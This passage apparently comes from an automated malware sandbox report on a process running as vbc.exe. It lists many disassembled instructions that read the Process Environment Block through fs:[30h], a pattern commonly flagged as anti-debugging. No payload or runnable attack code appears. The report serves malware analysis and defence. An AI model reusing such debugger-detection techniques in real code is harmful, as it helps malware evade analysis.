          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C720 mov eax, dword ptr fs:[00000030h]6_2_05C7C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBC730 mov eax, dword ptr fs:[00000030h]6_2_05CBC730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7273C mov eax, dword ptr fs:[00000030h]6_2_05C7273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7273C mov ecx, dword ptr fs:[00000030h]6_2_05C7273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7273C mov eax, dword ptr fs:[00000030h]6_2_05C7273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A6C7 mov ebx, dword ptr fs:[00000030h]6_2_05C7A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A6C7 mov eax, dword ptr fs:[00000030h]6_2_05C7A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE6F2 mov eax, dword ptr fs:[00000030h]6_2_05CBE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC06F1 mov eax, dword ptr fs:[00000030h]6_2_05CC06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC06F1 mov eax, dword ptr fs:[00000030h]6_2_05CC06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C44690 mov eax, dword ptr fs:[00000030h]6_2_05C44690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C44690 mov eax, dword ptr fs:[00000030h]6_2_05C44690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C6A6 mov eax, dword ptr fs:[00000030h]6_2_05C7C6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C766B0 mov eax, dword ptr fs:[00000030h]6_2_05C766B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5C640 mov eax, dword ptr fs:[00000030h]6_2_05C5C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A660 mov eax, dword ptr fs:[00000030h]6_2_05C7A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A660 mov eax, dword ptr fs:[00000030h]6_2_05C7A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72674 mov eax, dword ptr fs:[00000030h]6_2_05C72674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0866E mov eax, dword ptr fs:[00000030h]6_2_05D0866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0866E mov eax, dword ptr fs:[00000030h]6_2_05D0866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE609 mov eax, dword ptr fs:[00000030h]6_2_05CBE609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5260B mov eax, dword ptr fs:[00000030h]6_2_05C5260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82619 mov eax, dword ptr fs:[00000030h]6_2_05C82619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E627 mov eax, dword ptr fs:[00000030h]6_2_05C5E627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C76620 mov eax, dword ptr fs:[00000030h]6_2_05C76620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C78620 mov eax, dword ptr fs:[00000030h]6_2_05C78620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4262C mov eax, dword ptr fs:[00000030h]6_2_05C4262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D061C3 mov eax, dword ptr fs:[00000030h]6_2_05D061C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D061C3 mov eax, dword ptr fs:[00000030h]6_2_05D061C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov ecx, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBE1D0 mov eax, dword ptr fs:[00000030h]6_2_05CBE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D161E5 mov eax, dword ptr fs:[00000030h]6_2_05D161E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C701F8 mov eax, dword ptr fs:[00000030h]6_2_05C701F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFC188 mov eax, dword ptr fs:[00000030h]6_2_05CFC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFC188 mov eax, dword ptr fs:[00000030h]6_2_05CFC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C80185 mov eax, dword ptr fs:[00000030h]6_2_05C80185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4180 mov eax, dword ptr fs:[00000030h]6_2_05CE4180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE4180 mov eax, dword ptr fs:[00000030h]6_2_05CE4180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC019F mov eax, dword ptr fs:[00000030h]6_2_05CC019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A197 mov eax, dword ptr fs:[00000030h]6_2_05C3A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A197 mov eax, dword ptr fs:[00000030h]6_2_05C3A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A197 mov eax, dword ptr fs:[00000030h]6_2_05C3A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov ecx, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD4144 mov eax, dword ptr fs:[00000030h]6_2_05CD4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46154 mov eax, dword ptr fs:[00000030h]6_2_05C46154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46154 mov eax, dword ptr fs:[00000030h]6_2_05C46154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C156 mov eax, dword ptr fs:[00000030h]6_2_05C3C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD8158 mov eax, dword ptr fs:[00000030h]6_2_05CD8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14164 mov eax, dword ptr fs:[00000030h]6_2_05D14164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14164 mov eax, dword ptr fs:[00000030h]6_2_05D14164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov eax, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE10E mov ecx, dword ptr fs:[00000030h]6_2_05CEE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D00115 mov eax, dword ptr fs:[00000030h]6_2_05D00115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov ecx, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov eax, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov eax, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA118 mov eax, dword ptr fs:[00000030h]6_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C70124 mov eax, dword ptr fs:[00000030h]6_2_05C70124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC20DE mov eax, dword ptr fs:[00000030h]6_2_05CC20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A0E3 mov ecx, dword ptr fs:[00000030h]6_2_05C3A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC60E0 mov eax, dword ptr fs:[00000030h]6_2_05CC60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C480E9 mov eax, dword ptr fs:[00000030h]6_2_05C480E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C0F0 mov eax, dword ptr fs:[00000030h]6_2_05C3C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C820F0 mov ecx, dword ptr fs:[00000030h]6_2_05C820F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4208A mov eax, dword ptr fs:[00000030h]6_2_05C4208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C380A0 mov eax, dword ptr fs:[00000030h]6_2_05C380A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD80A8 mov eax, dword ptr fs:[00000030h]6_2_05CD80A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D060B8 mov eax, dword ptr fs:[00000030h]6_2_05D060B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D060B8 mov ecx, dword ptr fs:[00000030h]6_2_05D060B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42050 mov eax, dword ptr fs:[00000030h]6_2_05C42050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6050 mov eax, dword ptr fs:[00000030h]6_2_05CC6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6C073 mov eax, dword ptr fs:[00000030h]6_2_05C6C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4000 mov ecx, dword ptr fs:[00000030h]6_2_05CC4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE2000 mov eax, dword ptr fs:[00000030h]6_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E016 mov eax, dword ptr fs:[00000030h]6_2_05C5E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3A020 mov eax, dword ptr fs:[00000030h]6_2_05C3A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C020 mov eax, dword ptr fs:[00000030h]6_2_05C3C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD6030 mov eax, dword ptr fs:[00000030h]6_2_05CD6030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFC3CD mov eax, dword ptr fs:[00000030h]6_2_05CFC3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4A3C0 mov eax, dword ptr fs:[00000030h]6_2_05C4A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C483C0 mov eax, dword ptr fs:[00000030h]6_2_05C483C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC63C0 mov eax, dword ptr fs:[00000030h]6_2_05CC63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov eax, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov eax, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov ecx, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEE3DB mov eax, dword ptr fs:[00000030h]6_2_05CEE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE43D4 mov eax, dword ptr fs:[00000030h]6_2_05CE43D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE43D4 mov eax, dword ptr fs:[00000030h]6_2_05CE43D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C503E9 mov eax, dword ptr fs:[00000030h]6_2_05C503E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E3F0 mov eax, dword ptr fs:[00000030h]6_2_05C5E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E3F0 mov eax, dword ptr fs:[00000030h]6_2_05C5E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E3F0 mov eax, dword ptr fs:[00000030h]6_2_05C5E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C763FF mov eax, dword ptr fs:[00000030h]6_2_05C763FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6438F mov eax, dword ptr fs:[00000030h]6_2_05C6438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6438F mov eax, dword ptr fs:[00000030h]6_2_05C6438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E388 mov eax, dword ptr fs:[00000030h]6_2_05C3E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E388 mov eax, dword ptr fs:[00000030h]6_2_05C3E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E388 mov eax, dword ptr fs:[00000030h]6_2_05C3E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38397 mov eax, dword ptr fs:[00000030h]6_2_05C38397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38397 mov eax, dword ptr fs:[00000030h]6_2_05C38397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C38397 mov eax, dword ptr fs:[00000030h]6_2_05C38397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0A352 mov eax, dword ptr fs:[00000030h]6_2_05D0A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC2349 mov eax, dword ptr fs:[00000030h]6_2_05CC2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC035C mov eax, dword ptr fs:[00000030h]6_2_05CC035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC035C mov eax, dword ptr fs:[00000030h]6_2_05CC035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC035C mov eax, dword ptr fs:[00000030h]6_2_05CC035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC035C mov ecx, dword ptr fs:[00000030h]6_2_05CC035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC035C mov eax, dword ptr fs:[00000030h]6_2_05CC035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC035C mov eax, dword ptr fs:[00000030h]6_2_05CC035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE8350 mov ecx, dword ptr fs:[00000030h]6_2_05CE8350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D1634F mov eax, dword ptr fs:[00000030h]6_2_05D1634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE437C mov eax, dword ptr fs:[00000030h]6_2_05CE437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A30B mov eax, dword ptr fs:[00000030h]6_2_05C7A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A30B mov eax, dword ptr fs:[00000030h]6_2_05C7A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A30B mov eax, dword ptr fs:[00000030h]6_2_05C7A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C310 mov ecx, dword ptr fs:[00000030h]6_2_05C3C310
